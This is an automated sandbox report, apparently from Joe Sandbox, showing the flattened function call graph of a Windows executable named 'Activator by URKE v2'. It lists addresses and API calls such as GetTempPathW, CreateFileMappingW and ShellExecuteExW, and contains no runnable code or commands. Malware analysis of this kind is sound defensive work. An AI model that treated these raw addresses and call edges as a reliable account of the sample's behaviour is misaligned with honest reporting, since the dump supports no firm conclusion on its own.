23155->23214 23223 7ff7e5f0699c 125 API calls _handle_error 23155->23223 23156->23155 23157->23106 23158->23157 23159 7ff7e5f04d74 104 API calls 23158->23159 23159->23157 23160->23155 23162 7ff7e5f0495a 23161->23162 23167 7ff7e5f049b2 23161->23167 23233 7ff7e5ef4c70 23162->23233 23164 7ff7e5f04a2d 23164->23121 23165 7ff7e5f0499e 23168 7ff7e5ef42d0 100 API calls 23165->23168 23166 7ff7e5ef5ff4 51 API calls 23166->23164 23167->23164 23167->23166 23168->23167 23169->23122 23170->23109 23172 7ff7e5f05137 23171->23172 23178 7ff7e5f0512f 23171->23178 23173 7ff7e5f0518a 23172->23173 23174 7ff7e5f053bc 120 API calls 23172->23174 23172->23178 23173->23178 23238 7ff7e5f08d6c 8 API calls 23173->23238 23175 7ff7e5f05176 23174->23175 23175->23173 23177 7ff7e5f051e1 23175->23177 23175->23178 23239 7ff7e5ef3df0 99 API calls 2 library calls 23177->23239 23178->23123 23180->23123 23181 7ff7e5f13a80 23180->23181 23182 7ff7e5f13a8f SendDlgItemMessageW 23181->23182 23185 7ff7e5f04dad 23183->23185 23184 7ff7e5f04dd3 23184->23123 23185->23184 23240 7ff7e5ef4e18 23185->23240 23187->23111 23188->23128 23189->23118 23190->23119 23191->23136 23194 7ff7e5f062eb memcpy_s 23192->23194 23193 7ff7e5f0511c 120 API calls 23193->23194 23194->23193 23196 7ff7e5f0633d 23194->23196 23195 7ff7e5f0511c 120 API calls 23195->23196 23196->23195 23198 7ff7e5f0639f 23196->23198 23213 7ff7e5f0650a 23196->23213 23197 7ff7e5f15c30 _handle_error 8 API calls 23200 7ff7e5f0697b 23197->23200 23199 7ff7e5f0511c 120 API calls 23198->23199 23203 7ff7e5f063f8 23198->23203 23198->23213 23199->23198 23200->23155 23201 7ff7e5f064a2 23224 7ff7e5f0569c 23201->23224 23203->23201 23204 7ff7e5f0511c 120 API calls 23203->23204 23203->23213 23204->23203 23205 7ff7e5f06500 23207 7ff7e5f0674c 23205->23207 23209 7ff7e5f0511c 120 API calls 23205->23209 23205->23213 23206 7ff7e5f0569c 8 API calls 23208 7ff7e5f067c0 23206->23208 23207->23206 23210 7ff7e5f0569c 8 API calls 23208->23210 23208->23213 23209->23205 23211 7ff7e5f06896 
23210->23211 23211->23213 23228 7ff7e5f05e44 23211->23228 23213->23197 23215 7ff7e5f06ba8 23214->23215 23216 7ff7e5f0511c 120 API calls 23215->23216 23217 7ff7e5f06bdf 23215->23217 23216->23215 23218 7ff7e5f06bee 23217->23218 23219 7ff7e5f0511c 120 API calls 23217->23219 23221 7ff7e5f06c2d 23217->23221 23218->23155 23219->23217 23220 7ff7e5f0511c 120 API calls 23220->23221 23221->23218 23221->23220 23222 7ff7e5f04d74 104 API calls 23221->23222 23222->23221 23223->23155 23227 7ff7e5f056fe memcpy_s 23224->23227 23225 7ff7e5f15c30 _handle_error 8 API calls 23226 7ff7e5f05ae9 23225->23226 23226->23205 23227->23225 23232 7ff7e5f05ea7 23228->23232 23229 7ff7e5f06260 23229->23213 23230 7ff7e5f04d74 104 API calls 23230->23232 23231 7ff7e5f0511c 120 API calls 23231->23232 23232->23229 23232->23230 23232->23231 23234 7ff7e5ef4c94 23233->23234 23236 7ff7e5ef4ca4 23233->23236 23235 7ff7e5ef4c9a FlushFileBuffers 23234->23235 23234->23236 23235->23236 23237 7ff7e5ef4d0e SetFileTime 23236->23237 23237->23165 23239->23178 23241 7ff7e5ef4e44 23240->23241 23242 7ff7e5ef4e4b 23240->23242 23244 7ff7e5f15c30 _handle_error 8 API calls 23241->23244 23243 7ff7e5ef4e55 GetStdHandle 23242->23243 23248 7ff7e5ef4e63 23242->23248 23243->23248 23245 7ff7e5ef4fee 23244->23245 23245->23184 23246 7ff7e5ef4ebe WriteFile 23246->23248 23247 7ff7e5ef4e7e WriteFile 23247->23248 23249 7ff7e5ef4eb4 23247->23249 23248->23241 23248->23246 23248->23247 23251 7ff7e5ef4f56 23248->23251 23259 7ff7e5ef3a18 101 API calls 23248->23259 23249->23247 23249->23248 23252 7ff7e5ef12bc 33 API calls 23251->23252 23253 7ff7e5ef4f85 23252->23253 23260 7ff7e5ef4190 99 API calls _com_raise_error 23253->23260 23259->23248 23289 7ff7e5efe760 23292 7ff7e5efe7c0 SystemTimeToFileTime 23289->23292 23293 7ff7e5efe832 23292->23293 23294 7ff7e5efe8b7 23292->23294 23295 7ff7e5ef6768 9 API calls 23293->23295 23296 7ff7e5f15c30 _handle_error 8 API calls 23294->23296 23297 7ff7e5efe837 23295->23297 23298 7ff7e5efe7bb 23296->23298 23299 
7ff7e5efe842 LocalFileTimeToFileTime 23297->23299 23300 7ff7e5efe84e FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 23297->23300 23299->23294 23300->23294 20753 7ff7e5f0ece0 21098 7ff7e5ef215c 20753->21098 20755 7ff7e5f0ed2b 20756 7ff7e5f0ed3f 20755->20756 20757 7ff7e5f0f9e3 20755->20757 20759 7ff7e5f0ed5c 20755->20759 20756->20759 20762 7ff7e5f0ee2b 20756->20762 20763 7ff7e5f0ed4f 20756->20763 21362 7ff7e5f12ee0 20757->21362 21457 7ff7e5f15c30 20759->21457 20766 7ff7e5f0eee1 20762->20766 20771 7ff7e5f0ee45 20762->20771 20764 7ff7e5f0ed57 20763->20764 20765 7ff7e5f0edf9 20763->20765 20764->20759 20776 7ff7e5efaee0 48 API calls 20764->20776 20765->20759 20770 7ff7e5f0ee1b EndDialog 20765->20770 21106 7ff7e5ef1ebc GetDlgItem 20766->21106 20767 7ff7e5f0fa19 20773 7ff7e5f0fa40 GetDlgItem SendMessageW 20767->20773 20774 7ff7e5f0fa25 SendDlgItemMessageW 20767->20774 20768 7ff7e5f0fa0a SendMessageW 20768->20767 20770->20759 20777 7ff7e5efaee0 48 API calls 20771->20777 21381 7ff7e5ef7a28 GetCurrentDirectoryW 20773->21381 20774->20773 20781 7ff7e5f0ed86 20776->20781 20782 7ff7e5f0ee63 SetDlgItemTextW 20777->20782 20779 7ff7e5f0ef01 EndDialog 20959 7ff7e5f0ef2a 20779->20959 20780 7ff7e5f0fa97 GetDlgItem 21391 7ff7e5ef2120 20780->21391 21395 7ff7e5ef1a94 34 API calls _handle_error 20781->21395 20786 7ff7e5f0ee76 20782->20786 20785 7ff7e5f0ef58 GetDlgItem 20790 7ff7e5f0ef9f SetFocus 20785->20790 20791 7ff7e5f0ef72 SendMessageW SendMessageW 20785->20791 20786->20759 20794 7ff7e5f0ee90 GetMessageW 20786->20794 20789 7ff7e5f0ed96 20793 7ff7e5f0edac 20789->20793 21396 7ff7e5ef210c 20789->21396 20795 7ff7e5f0f042 20790->20795 20796 7ff7e5f0efb5 20790->20796 20791->20790 20793->20759 20811 7ff7e5f0feb3 20793->20811 20794->20759 20801 7ff7e5f0eeae IsDialogMessageW 20794->20801 21399 7ff7e5ef2314 20795->21399 21120 7ff7e5efaee0 20796->21120 20797 7ff7e5ef1b70 31 API calls 20797->20759 20801->20786 20806 7ff7e5f0eec3 TranslateMessage 
DispatchMessageW 20801->20806 20802 7ff7e5f0f815 20807 7ff7e5efaee0 48 API calls 20802->20807 20805 7ff7e5f0f07c 21409 7ff7e5f12ad0 33 API calls 2 library calls 20805->21409 20806->20786 20812 7ff7e5f0f826 SetDlgItemTextW 20807->20812 20808 7ff7e5f0efbf 21127 7ff7e5ef12bc 20808->21127 21466 7ff7e5f1ae94 20811->21466 20816 7ff7e5efaee0 48 API calls 20812->20816 20815 7ff7e5f0f087 20822 7ff7e5efaee0 48 API calls 20815->20822 20817 7ff7e5f0f858 20816->20817 20833 7ff7e5ef12bc 33 API calls 20817->20833 20819 7ff7e5f0feb8 20829 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 20819->20829 20825 7ff7e5f0f0a5 20822->20825 20823 7ff7e5f0efe8 21137 7ff7e5f12bf4 20823->21137 21410 7ff7e5efda04 48 API calls 20825->21410 20836 7ff7e5f0febe 20829->20836 20832 7ff7e5f0f0b8 20840 7ff7e5f12bf4 24 API calls 20832->20840 20866 7ff7e5f0f881 20833->20866 20846 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 20836->20846 20843 7ff7e5f0f0c8 20840->20843 20856 7ff7e5ef1b70 31 API calls 20843->20856 20844 7ff7e5f0f92a 20850 7ff7e5efaee0 48 API calls 20844->20850 20852 7ff7e5f0fec4 20846->20852 20861 7ff7e5f0f934 20850->20861 20851 7ff7e5f0f038 20859 7ff7e5f0f13c 20851->20859 21411 7ff7e5f13584 33 API calls 2 library calls 20851->21411 20872 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 20852->20872 20864 7ff7e5f0f0d6 20856->20864 20869 7ff7e5f0f16a 20859->20869 21412 7ff7e5ef587c 20859->21412 20883 7ff7e5ef12bc 33 API calls 20861->20883 20864->20836 20864->20851 20866->20844 20878 7ff7e5ef12bc 33 API calls 20866->20878 21151 7ff7e5ef552c 20869->21151 20877 7ff7e5f0feca 20872->20877 20888 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 20877->20888 20884 7ff7e5f0f8cf 20878->20884 20881 7ff7e5f0f19c 21163 7ff7e5ef8cf8 20881->21163 20882 7ff7e5f0f184 GetLastError 20882->20881 20887 7ff7e5f0f95d 20883->20887 20890 7ff7e5efaee0 48 API calls 20884->20890 20886 7ff7e5f0f15e 21415 7ff7e5f0d908 12 API calls _handle_error 20886->21415 20902 
7ff7e5ef12bc 33 API calls 20887->20902 20894 7ff7e5f0fed0 20888->20894 20895 7ff7e5f0f8da 20890->20895 20903 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 20894->20903 21452 7ff7e5ef1170 33 API calls BuildCatchObjectHelperInternal 20895->21452 20898 7ff7e5f0f1ae 20901 7ff7e5f0f1b5 GetLastError 20898->20901 20907 7ff7e5f0f1c4 20898->20907 20901->20907 20908 7ff7e5f0f99e 20902->20908 20909 7ff7e5f0fed6 20903->20909 20904 7ff7e5f0f8f2 21453 7ff7e5ef1c04 20904->21453 20906 7ff7e5f0f26c 20911 7ff7e5f0f27b 20906->20911 20929 7ff7e5f0f6c9 20906->20929 20907->20906 20907->20911 20913 7ff7e5f0f1db GetTickCount 20907->20913 20923 7ff7e5ef1b70 31 API calls 20908->20923 20914 7ff7e5ef215c 61 API calls 20909->20914 20915 7ff7e5f0f5a0 20911->20915 21416 7ff7e5ef7c10 20911->21416 21166 7ff7e5ef5238 20913->21166 20918 7ff7e5f0ff34 20914->20918 20915->20779 21441 7ff7e5ef6e5c 20915->21441 20916 7ff7e5f0f90e 20919 7ff7e5ef1b70 31 API calls 20916->20919 20924 7ff7e5f0ff38 20918->20924 20932 7ff7e5f0ffd9 GetDlgItem SetFocus 20918->20932 20978 7ff7e5f0ff4d 20918->20978 20926 7ff7e5f0f91c 20919->20926 20931 7ff7e5f0f9c8 20923->20931 20940 7ff7e5f15c30 _handle_error 8 API calls 20924->20940 20934 7ff7e5ef1b70 31 API calls 20926->20934 20927 7ff7e5f0f29e 21428 7ff7e5efbc90 131 API calls 20927->21428 20943 7ff7e5efaee0 48 API calls 20929->20943 20939 7ff7e5ef1b70 31 API calls 20931->20939 20936 7ff7e5f1000a 20932->20936 20934->20844 20949 7ff7e5ef12bc 33 API calls 20936->20949 20937 7ff7e5f0f20a 21176 7ff7e5ef1b70 20937->21176 20945 7ff7e5f0f9d3 20939->20945 20946 7ff7e5f105e7 20940->20946 20941 7ff7e5f0f2b8 21429 7ff7e5efda04 48 API calls 20941->21429 20951 7ff7e5f0f6f7 SetDlgItemTextW 20943->20951 20944 7ff7e5f0f5da 20952 7ff7e5efaee0 48 API calls 20944->20952 20953 7ff7e5ef1b70 31 API calls 20945->20953 20956 7ff7e5f1001c 20949->20956 20950 7ff7e5f0f218 21181 7ff7e5ef4334 20950->21181 20957 7ff7e5ef2134 20951->20957 20958 7ff7e5f0f5e7 20952->20958 20953->20959 20954 
7ff7e5f0ff84 SendDlgItemMessageW 20960 7ff7e5f0ffad EndDialog 20954->20960 20961 7ff7e5f0ffa4 20954->20961 20955 7ff7e5f0f2fa GetCommandLineW 20962 7ff7e5f0f3b9 20955->20962 20963 7ff7e5f0f39f 20955->20963 21471 7ff7e5ef8e0c 20956->21471 20965 7ff7e5f0f715 SetDlgItemTextW GetDlgItem 20957->20965 21450 7ff7e5ef1170 33 API calls BuildCatchObjectHelperInternal 20958->21450 20959->20797 20960->20924 20961->20960 21434 7ff7e5f0e6a4 33 API calls _handle_error 20962->21434 21430 7ff7e5ef1c80 20963->21430 20970 7ff7e5f0f740 GetWindowLongPtrW SetWindowLongPtrW 20965->20970 20971 7ff7e5f0f763 20965->20971 20970->20971 21201 7ff7e5f109d8 20971->21201 20972 7ff7e5f0f5fa 20977 7ff7e5ef1b70 31 API calls 20972->20977 20973 7ff7e5ef210c SetDlgItemTextW 20980 7ff7e5f10044 20973->20980 20974 7ff7e5f0f3ca 21435 7ff7e5f0e6a4 33 API calls _handle_error 20974->21435 20985 7ff7e5f0f605 20977->20985 20978->20924 20978->20954 20990 7ff7e5f10076 SendDlgItemMessageW FindFirstFileW 20980->20990 20982 7ff7e5f0f254 21197 7ff7e5ef424c 20982->21197 20983 7ff7e5f0f245 GetLastError 20983->20982 20989 7ff7e5ef1b70 31 API calls 20985->20989 20986 7ff7e5f0f3db 21436 7ff7e5f0e6a4 33 API calls _handle_error 20986->21436 20988 7ff7e5f109d8 188 API calls 20993 7ff7e5f0f78c 20988->20993 20994 7ff7e5f0f613 20989->20994 20995 7ff7e5f100cb 20990->20995 21090 7ff7e5f10554 20990->21090 21354 7ff7e5f134c4 20993->21354 21002 7ff7e5efaee0 48 API calls 20994->21002 21006 7ff7e5efaee0 48 API calls 20995->21006 20996 7ff7e5f0f3ec 21437 7ff7e5efbd30 131 API calls 20996->21437 21001 7ff7e5f109d8 188 API calls 21017 7ff7e5f0f7ba 21001->21017 21005 7ff7e5f0f62b 21002->21005 21003 7ff7e5f0f403 21438 7ff7e5f136e0 33 API calls 21003->21438 21004 7ff7e5f105d1 21004->20924 21018 7ff7e5ef12bc 33 API calls 21005->21018 21010 7ff7e5f100ee 21006->21010 21008 7ff7e5f105f9 21012 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21008->21012 21009 7ff7e5f0f7e6 21451 7ff7e5ef1e98 GetDlgItem EnableWindow 21009->21451 21023 
7ff7e5ef12bc 33 API calls 21010->21023 21011 7ff7e5f0f422 CreateFileMappingW 21015 7ff7e5f0f461 MapViewOfFile 21011->21015 21016 7ff7e5f0f4a3 ShellExecuteExW 21011->21016 21013 7ff7e5f105fe 21012->21013 21021 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21013->21021 21439 7ff7e5f16e10 21015->21439 21027 7ff7e5f0f4c4 21016->21027 21017->21009 21022 7ff7e5f109d8 188 API calls 21017->21022 21031 7ff7e5f0f654 21018->21031 21019 7ff7e5f0ef45 21019->20779 21019->20802 21024 7ff7e5f10604 21021->21024 21022->21009 21025 7ff7e5f1011d 21023->21025 21030 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21024->21030 21475 7ff7e5ef1170 33 API calls BuildCatchObjectHelperInternal 21025->21475 21028 7ff7e5f0f513 21027->21028 21029 7ff7e5f0f4e6 WaitForInputIdle 21027->21029 21039 7ff7e5f0f52c UnmapViewOfFile CloseHandle 21028->21039 21040 7ff7e5f0f53f 21028->21040 21034 7ff7e5f0f4fb 21029->21034 21035 7ff7e5f1060a 21030->21035 21031->20877 21032 7ff7e5f0f6aa 21031->21032 21036 7ff7e5ef1b70 31 API calls 21032->21036 21033 7ff7e5f10138 21476 7ff7e5ef52c0 21033->21476 21034->21028 21038 7ff7e5f0f501 Sleep 21034->21038 21043 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21035->21043 21036->20779 21038->21028 21038->21034 21039->21040 21040->20852 21042 7ff7e5f0f575 21040->21042 21041 7ff7e5f1014f 21044 7ff7e5ef1b70 31 API calls 21041->21044 21046 7ff7e5ef1b70 31 API calls 21042->21046 21045 7ff7e5f10610 21043->21045 21047 7ff7e5f1015c 21044->21047 21050 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21045->21050 21048 7ff7e5f0f592 21046->21048 21047->21013 21049 7ff7e5ef1b70 31 API calls 21047->21049 21051 7ff7e5ef1b70 31 API calls 21048->21051 21052 7ff7e5f101c3 21049->21052 21053 7ff7e5f10616 21050->21053 21051->20915 21054 7ff7e5ef210c SetDlgItemTextW 21052->21054 21056 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21053->21056 21055 7ff7e5f101d7 FindClose 21054->21055 21057 7ff7e5f102e7 SendDlgItemMessageW 
21055->21057 21058 7ff7e5f101f3 21055->21058 21059 7ff7e5f1061c 21056->21059 21061 7ff7e5f1031b 21057->21061 21486 7ff7e5f0de44 10 API calls _handle_error 21058->21486 21064 7ff7e5efaee0 48 API calls 21061->21064 21062 7ff7e5f10216 21063 7ff7e5efaee0 48 API calls 21062->21063 21066 7ff7e5f1021f 21063->21066 21065 7ff7e5f10328 21064->21065 21068 7ff7e5ef12bc 33 API calls 21065->21068 21487 7ff7e5efda04 48 API calls 21066->21487 21069 7ff7e5f10357 21068->21069 21488 7ff7e5ef1170 33 API calls BuildCatchObjectHelperInternal 21069->21488 21070 7ff7e5ef1b70 31 API calls 21073 7ff7e5f102d3 21070->21073 21072 7ff7e5f1023c BuildCatchObjectHelperInternal 21072->21024 21072->21070 21075 7ff7e5ef210c SetDlgItemTextW 21073->21075 21074 7ff7e5f10372 21076 7ff7e5ef52c0 33 API calls 21074->21076 21075->21057 21077 7ff7e5f10389 21076->21077 21078 7ff7e5ef1b70 31 API calls 21077->21078 21079 7ff7e5f10395 BuildCatchObjectHelperInternal 21078->21079 21080 7ff7e5ef1b70 31 API calls 21079->21080 21081 7ff7e5f103cf 21080->21081 21082 7ff7e5ef1b70 31 API calls 21081->21082 21083 7ff7e5f103dc 21082->21083 21083->21035 21084 7ff7e5ef1b70 31 API calls 21083->21084 21085 7ff7e5f10443 21084->21085 21086 7ff7e5ef210c SetDlgItemTextW 21085->21086 21087 7ff7e5f10457 21086->21087 21087->21090 21489 7ff7e5f0de44 10 API calls _handle_error 21087->21489 21089 7ff7e5f10482 21091 7ff7e5efaee0 48 API calls 21089->21091 21090->20924 21090->21004 21090->21008 21090->21053 21092 7ff7e5f1048c 21091->21092 21490 7ff7e5efda04 48 API calls 21092->21490 21094 7ff7e5ef1b70 31 API calls 21096 7ff7e5f10540 21094->21096 21095 7ff7e5f104a9 BuildCatchObjectHelperInternal 21095->21045 21095->21094 21097 7ff7e5ef210c SetDlgItemTextW 21096->21097 21097->21090 21099 7ff7e5ef21d0 21098->21099 21100 7ff7e5ef216a 21098->21100 21099->20755 21100->21099 21491 7ff7e5efa8ac 21100->21491 21102 7ff7e5ef218f 21102->21099 21103 7ff7e5ef21a4 GetDlgItem 21102->21103 21103->21099 21104 7ff7e5ef21b7 21103->21104 21104->21099 21105 
7ff7e5ef21be SetWindowTextW 21104->21105 21105->21099 21107 7ff7e5ef1f34 21106->21107 21108 7ff7e5ef1efc 21106->21108 21591 7ff7e5ef1ff8 GetWindowTextLengthW 21107->21591 21111 7ff7e5ef12bc 33 API calls 21108->21111 21110 7ff7e5ef1f2a BuildCatchObjectHelperInternal 21112 7ff7e5ef1b70 31 API calls 21110->21112 21115 7ff7e5ef1f89 21110->21115 21111->21110 21112->21115 21113 7ff7e5ef1fc8 21114 7ff7e5f15c30 _handle_error 8 API calls 21113->21114 21116 7ff7e5ef1fdd 21114->21116 21115->21113 21117 7ff7e5ef1ff0 21115->21117 21116->20779 21116->20785 21116->21019 21118 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21117->21118 21119 7ff7e5ef1ff5 21118->21119 21121 7ff7e5efaef3 21120->21121 21613 7ff7e5ef9b74 21121->21613 21124 7ff7e5efaf86 21124->20808 21125 7ff7e5efaf58 LoadStringW 21125->21124 21126 7ff7e5efaf71 LoadStringW 21125->21126 21126->21124 21128 7ff7e5ef12f0 21127->21128 21135 7ff7e5ef13bb 21127->21135 21130 7ff7e5ef12fe BuildCatchObjectHelperInternal 21128->21130 21132 7ff7e5ef13b6 21128->21132 21134 7ff7e5ef1358 21128->21134 21130->20823 21641 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21132->21641 21134->21130 21632 7ff7e5f15ae0 21134->21632 21642 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21135->21642 21645 7ff7e5f0e96c PeekMessageW 21137->21645 21140 7ff7e5f12c93 SendMessageW SendMessageW 21142 7ff7e5f12cd9 21140->21142 21143 7ff7e5f12cf4 SendMessageW 21140->21143 21141 7ff7e5f12c45 21144 7ff7e5f12c51 ShowWindow SendMessageW SendMessageW 21141->21144 21142->21143 21145 7ff7e5f12d13 21143->21145 21146 7ff7e5f12d16 SendMessageW SendMessageW 21143->21146 21144->21140 21145->21146 21147 7ff7e5f12d68 SendMessageW 21146->21147 21148 7ff7e5f12d43 SendMessageW 21146->21148 21149 7ff7e5f15c30 _handle_error 8 API calls 21147->21149 21148->21147 21150 7ff7e5f0eff5 21149->21150 21150->20819 21150->20851 21152 7ff7e5ef5671 21151->21152 21159 7ff7e5ef5562 21151->21159 21153 7ff7e5f15c30 _handle_error 8 
API calls 21152->21153 21154 7ff7e5ef5687 21153->21154 21154->20881 21154->20882 21155 7ff7e5ef564b 21155->21152 21156 7ff7e5ef5c60 56 API calls 21155->21156 21156->21152 21157 7ff7e5ef12bc 33 API calls 21157->21159 21159->21155 21159->21157 21160 7ff7e5ef569c 21159->21160 21650 7ff7e5ef5c60 21159->21650 21161 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21160->21161 21162 7ff7e5ef56a1 21161->21162 21164 7ff7e5ef8d06 SetCurrentDirectoryW 21163->21164 21165 7ff7e5ef8d03 21163->21165 21164->20898 21165->21164 21167 7ff7e5ef5265 21166->21167 21168 7ff7e5ef527a 21167->21168 21169 7ff7e5ef12bc 33 API calls 21167->21169 21170 7ff7e5f15c30 _handle_error 8 API calls 21168->21170 21169->21168 21171 7ff7e5ef52b1 21170->21171 21172 7ff7e5f0d1bc 21171->21172 21173 7ff7e5f0d1e3 21172->21173 21796 7ff7e5ef60e0 21173->21796 21175 7ff7e5f0d1f3 BuildCatchObjectHelperInternal 21175->20937 21177 7ff7e5ef1b83 21176->21177 21178 7ff7e5ef1bac 21176->21178 21177->21178 21179 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21177->21179 21178->20950 21180 7ff7e5ef1bd0 21179->21180 21184 7ff7e5ef436a 21181->21184 21182 7ff7e5ef439e 21185 7ff7e5ef80b0 49 API calls 21182->21185 21187 7ff7e5ef447f 21182->21187 21183 7ff7e5ef43b1 CreateFileW 21183->21182 21184->21182 21184->21183 21188 7ff7e5ef4409 21185->21188 21186 7ff7e5ef44af 21189 7ff7e5f15c30 _handle_error 8 API calls 21186->21189 21187->21186 21192 7ff7e5ef1c80 33 API calls 21187->21192 21190 7ff7e5ef4446 21188->21190 21191 7ff7e5ef440d CreateFileW 21188->21191 21193 7ff7e5ef44c4 21189->21193 21190->21187 21194 7ff7e5ef44d8 21190->21194 21191->21190 21192->21186 21193->20982 21193->20983 21195 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21194->21195 21196 7ff7e5ef44dd 21195->21196 21198 7ff7e5ef4272 21197->21198 21199 7ff7e5ef4266 21197->21199 21199->21198 21805 7ff7e5ef42d0 21199->21805 21812 7ff7e5f0e558 21201->21812 21203 7ff7e5f10d3e 21204 7ff7e5ef1b70 31 API calls 21203->21204 21205 
7ff7e5f10d47 21204->21205 21206 7ff7e5f15c30 _handle_error 8 API calls 21205->21206 21208 7ff7e5f0f77b 21206->21208 21207 7ff7e5efd124 33 API calls 21353 7ff7e5f10a53 BuildCatchObjectHelperInternal 21207->21353 21208->20988 21209 7ff7e5f12a4a 21926 7ff7e5ef353c 47 API calls 21209->21926 21212 7ff7e5f12a50 21927 7ff7e5ef353c 47 API calls 21212->21927 21215 7ff7e5f12a3e 21217 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21215->21217 21216 7ff7e5f12a56 21219 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21216->21219 21218 7ff7e5f12a44 21217->21218 21925 7ff7e5ef353c 47 API calls 21218->21925 21220 7ff7e5f12a5c 21219->21220 21223 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21220->21223 21224 7ff7e5f12a62 21223->21224 21229 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21224->21229 21225 7ff7e5f1299a 21226 7ff7e5f12a22 21225->21226 21230 7ff7e5ef1c80 33 API calls 21225->21230 21923 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21226->21923 21227 7ff7e5ef13c4 33 API calls 21233 7ff7e5f1178a GetTempPathW 21227->21233 21228 7ff7e5f12a38 21924 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21228->21924 21234 7ff7e5f12a68 21229->21234 21232 7ff7e5f129c7 21230->21232 21922 7ff7e5f0e738 33 API calls 3 library calls 21232->21922 21233->21353 21240 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21234->21240 21235 7ff7e5ef7a28 35 API calls 21235->21353 21239 7ff7e5f129dd 21247 7ff7e5ef1b70 31 API calls 21239->21247 21250 7ff7e5f129f4 BuildCatchObjectHelperInternal 21239->21250 21245 7ff7e5f12a6e 21240->21245 21241 7ff7e5ef2120 SetWindowTextW 21241->21353 21244 7ff7e5f1f094 43 API calls 21244->21353 21251 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21245->21251 21246 7ff7e5f12343 21246->21226 21246->21228 21249 7ff7e5f15ae0 4 API calls 21246->21249 21261 7ff7e5f1238b BuildCatchObjectHelperInternal 21246->21261 21247->21250 21248 7ff7e5ef1b70 
31 API calls 21248->21226 21249->21261 21250->21248 21253 7ff7e5f12a74 21251->21253 21252 7ff7e5f0e558 33 API calls 21252->21353 21260 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21253->21260 21255 7ff7e5f12abc 21930 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21255->21930 21256 7ff7e5ef62f0 54 API calls 21256->21353 21258 7ff7e5ef1b70 31 API calls 21258->21225 21259 7ff7e5f12ac8 21932 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21259->21932 21265 7ff7e5f12a7a 21260->21265 21267 7ff7e5ef1c80 33 API calls 21261->21267 21309 7ff7e5f126df 21261->21309 21262 7ff7e5f12ac2 21931 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21262->21931 21263 7ff7e5ef1c80 33 API calls 21345 7ff7e5f10fd9 21263->21345 21273 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21265->21273 21266 7ff7e5f12ab6 21929 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21266->21929 21274 7ff7e5f124b3 21267->21274 21270 7ff7e5ef12bc 33 API calls 21270->21353 21271 7ff7e5ef6dd8 33 API calls 21271->21353 21272 7ff7e5f1277a 21272->21255 21272->21266 21284 7ff7e5f127c2 BuildCatchObjectHelperInternal 21272->21284 21290 7ff7e5f15ae0 4 API calls 21272->21290 21294 7ff7e5f1288b BuildCatchObjectHelperInternal 21272->21294 21281 7ff7e5f12a80 21273->21281 21282 7ff7e5f12ab0 21274->21282 21289 7ff7e5ef12bc 33 API calls 21274->21289 21276 7ff7e5ef1b70 31 API calls 21276->21353 21278 7ff7e5f12890 21278->21259 21278->21262 21278->21294 21299 7ff7e5f15ae0 4 API calls 21278->21299 21280 7ff7e5ef52c0 33 API calls 21280->21353 21295 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21281->21295 21928 7ff7e5ef353c 47 API calls 21282->21928 21283 7ff7e5ef5ff4 51 API calls 21283->21353 21817 7ff7e5f13030 21284->21817 21286 7ff7e5f11139 GetDlgItem 21292 7ff7e5ef2120 SetWindowTextW 21286->21292 21288 7ff7e5f0d6d8 31 API calls 21288->21353 21296 7ff7e5f124f6 21289->21296 21290->21284 21297 

Control-flow Graph (legend: Executed / Not Executed; first block 7ff7e5efdc4c-7ff7e5efdcb0)
Memory Dump Source
• Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$AddressProc$DirectoryHandleLibraryLoadModuleSystem
